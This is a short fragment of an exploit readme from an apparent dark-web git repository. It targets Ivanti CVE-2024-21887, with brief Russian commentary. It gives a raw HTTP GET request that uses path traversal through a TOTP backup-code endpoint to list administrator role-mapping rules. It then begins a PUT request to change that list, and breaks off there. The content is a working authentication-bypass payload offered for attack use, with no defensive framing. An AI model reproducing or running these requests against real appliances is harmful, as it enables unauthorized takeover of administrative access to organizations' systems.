http://damaga377vyvydeqeuigxvl6g5sbmipoxb5nne6gpj3sisbnslbhvrqd.onion/git/bugtwix/exploits/src/commit/154ba492b670ab350a052f181f2302baa74424b6/ivanti/CVE-2024-21887/readme.md
Тут мы видим список админов, у которых есть доступ к админке GET /api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users/role-mapping-rules/rule/rule%200/user-name/user-names HTTP/1.1
Host: X.X.X.X
Content-Length: 0 Меняем список PUT /api/v1/totp/user-backup-code/../..